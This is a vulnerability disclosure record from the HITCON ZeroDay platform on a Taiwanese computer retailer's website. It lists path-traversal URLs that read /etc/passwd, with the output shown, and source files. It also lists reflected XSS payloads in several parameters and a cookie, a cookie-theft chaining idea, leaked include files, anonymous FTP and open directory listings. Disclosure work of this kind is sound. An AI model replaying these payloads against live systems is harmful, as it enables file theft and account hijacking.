Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2020-00002
- Vendor: 原價屋電腦有限公司
- Title: 原價屋 多個漏洞
- Introduction: 多個漏洞
處理狀態
目前狀態
公開
Last Update : 2020/03/17
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2020/01/02 21:51:22 : 新提交 (由 Hzllaga 更新此狀態)
- 2020/01/02 22:04:16 : 新提交 (由 Hzllaga 更新此狀態)
- 2020/01/02 22:06:50 : 新提交 (由 Hzllaga 更新此狀態)
- 2020/01/02 23:30:32 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/01/02 23:30:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/01/03 17:07:38 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/01/03 17:07:38 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/01/03 17:07:38 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/03/17 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2020-00002
- 通報者:haihai (Hzllaga)
- 風險:高
- 類型:本地檔案引入 (Local File Inclusion, LFI)
參考資料
攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。
漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.coolpc.com.tw/
敘述
LFI:
- http://www.coolpc.com.tw/m/my.php?Rmail=../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ... - http://www.coolpc.com.tw/m/my.php?Rmail=../../../../var/www/html/horde/lib/Registry.php
XSS:
ZD-2019-01217沒有修復-
http://www.coolpc.com.tw/horde/css.php?app=imp%3Cscript%3Ealert(1)%3C/script%3E http://www.coolpc.com.tw/chat/frame.php?uid=123"%3E%3C/frameset%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.coolpc.com.tw/chat/login.php cookie的cookie_nick_name => "><ScRiPt>alert(1)</ScRiPt> http://www.coolpc.com.tw/m/my.php?Rmail=%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.coolpc.com.tw/m/my.php?email=%22%3E%3Cscript%3Ealert(1)%3C/script%3E可以搭配 "Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability" 來獲取phpBB3 httpOnly保護的cookie
隨便新增一個cookie value隨便填 這邊測試輸入7000個A
資訊洩漏:
- http://www.coolpc.com.tw/horde/css.php?app=xx
/var/www/html/horde/lib/Registry.php -
http://www.coolpc.com.tw/chat/common.inc
<?php // chat common function include("conf/config.php"); include("lib/sys_func.php"); include("lib/chat_lib.php"); include("lib/check_online.php"); ?> - http://www.coolpc.com.tw/chat/bin/common.inc
- FTP可用anonymous登入
隨便下載一個文件看看: - Directory listing
http://www.coolpc.com.tw/horde/imp/graphics/
http://www.coolpc.com.tw/icons/
http://www.coolpc.com.tw/horde/imp/docs/
...
DOS:
- Slow HTTP Denial of Service Attack
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。